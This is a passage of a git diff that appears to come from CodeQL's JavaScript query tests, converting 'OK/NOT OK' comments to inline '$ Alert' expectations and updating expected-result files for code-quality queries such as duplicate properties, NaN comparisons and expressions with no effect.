b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref @@ -1 +1,2 @@ -Electron/EnablingNodeIntegration.ql +query: Electron/EnablingNodeIntegration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref index 07ff4053aefc..6dcd4ec7bef2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref @@ -1 +1,2 @@ -Expressions/BitwiseSignCheck.ql \ No newline at end of file +query: Expressions/BitwiseSignCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..ef5d14506bc2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js @@ -1,23 +1,21 @@ function bitIsSet(x, n) { - return (x & (1< 0; + return (x & (1< 0; // $ Alert } console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // $ Alert - prints 'true' + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref index 37235c0e9dfd..ad4cbb7600e8 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -Expressions/CompareIdenticalValues.ql \ No newline at end of file +query: Expressions/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..b8b1b4c85dcb 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js @@ -8,38 +8,37 @@ function Rectangle(x, y, width, height) { Rectangle.prototype.contains = function(x, y) { return (this.x <= x && x < this.x+this.width) && - (y <= y && + (y <= y && // $ Alert y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref index d8b4e6b39a53..9147587a96a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref +++ b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref @@ -1 +1,2 @@ -Expressions/ComparisonWithNaN.ql \ No newline at end of file +query: Expressions/ComparisonWithNaN.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js index 0e65c179d140..a2a4feec0f54 100644 --- a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js @@ -1,9 +1,9 @@ -x == NaN; -x != NaN; -x === NaN; -NaN !== x; -x < NaN; -NaN === NaN; +x == NaN; // $ Alert +x != NaN; // $ Alert +x === NaN; // $ Alert +NaN !== x; // $ Alert +x < NaN; // $ Alert +NaN === NaN; // $ Alert isNaN(x); function f(x, NaN) { diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref index da7e874d5026..4c5c9f527628 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref @@ -1 +1,2 @@ -Expressions/DuplicateCondition.ql \ No newline at end of file +query: Expressions/DuplicateCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js index 11a0b8c824de..cce5ff36fcfc 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js @@ -1,7 +1,7 @@ function controller(msg) { if (msg == 'start') start(); - else if (msg == 'start') + else if (msg == 'start') // $ Alert stop(); else throw new Error("Message not understood."); diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref index 5a1301784da4..6c32a22906cd 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref @@ -1 +1,2 @@ -Expressions/DuplicateProperty.ql +query: Expressions/DuplicateProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js @@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js index 992f9bc5c8d7..c673055fbf71 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js @@ -3,7 +3,7 @@ var o = { getX: function() { return this.x; - }, + }, // $ Alert setX: function(x) { this.x = x; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref index c63203f1a8ca..c95618b5b331 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref @@ -1 +1,2 @@ -Expressions/DuplicateSwitchCase.ql \ No newline at end of file +query: Expressions/DuplicateSwitchCase.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js index aa635dec8bb8..8056a9f0e74d 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js @@ -3,7 +3,7 @@ function controller(msg) { case 'start': start(); break; - case 'start': + case 'start': // $ Alert stop(); break; default: diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..853e781c88e2 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected @@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | -| uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | +| uselessfn.js:1:1:1:26 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref index 83e04904db2a..f4e3458759ba 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Expressions/ExprHasNoEffect.ql \ No newline at end of file +query: Expressions/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..a91759e553f1 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js @@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK /** Useless */ -x; +x; // $ Alert -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, "nonTrivialNonGetter1", getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js index e3634673ea58..341644bf6498 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js @@ -1,3 +1,3 @@ -(function f() { +(function f() { // $ Alert console.log("I'm never called."); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..60c9c95e2484 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected @@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:205:12:205:13 | t3 | variable 't3' | -| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' | -| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' | -| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' | -| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' | -| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression | -| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression | +| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' | +| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression | +| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression | +| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression | +| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:23:28:23:36 | undefined | 'undefined' | +| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' | +| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression | +| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression | +| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression | +| tst.js:78:31:78:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:78:38:78:41 | null | an expression | +| tst.js:81:35:81:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:81:42:81:45 | null | an expression | +| tst.js:91:5:91:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:91:12:91:15 | null | an expression | +| tst.js:94:9:94:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:94:16:94:19 | null | an expression | +| tst.js:100:5:100:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:100:9:100:13 | "def" | an expression | +| tst.js:107:5:107:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:107:9:107:13 | "def" | an expression | +| tst.js:121:5:121:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:121:13:121:14 | 42 | an expression | +| tst.js:124:5:124:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:124:13:124:17 | "bar" | an expression | +| tst.js:132:5:132:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:132:11:132:14 | "42" | an expression | +| tst.js:133:5:133:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:133:12:133:12 | b | variable 'b' | +| tst.js:134:5:134:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:134:11:134:11 | b | variable 'b' | +| tst.js:138:5:138:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:138:15:138:23 | undefined | 'undefined' | +| tst.js:139:5:139:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:139:19:139:23 | "foo" | an expression | +| tst.js:141:5:141:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:141:13:141:17 | "foo" | an expression | +| tst.js:143:5:143:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:143:18:143:22 | "foo" | an expression | +| tst.js:150:5:150:6 | t1 | 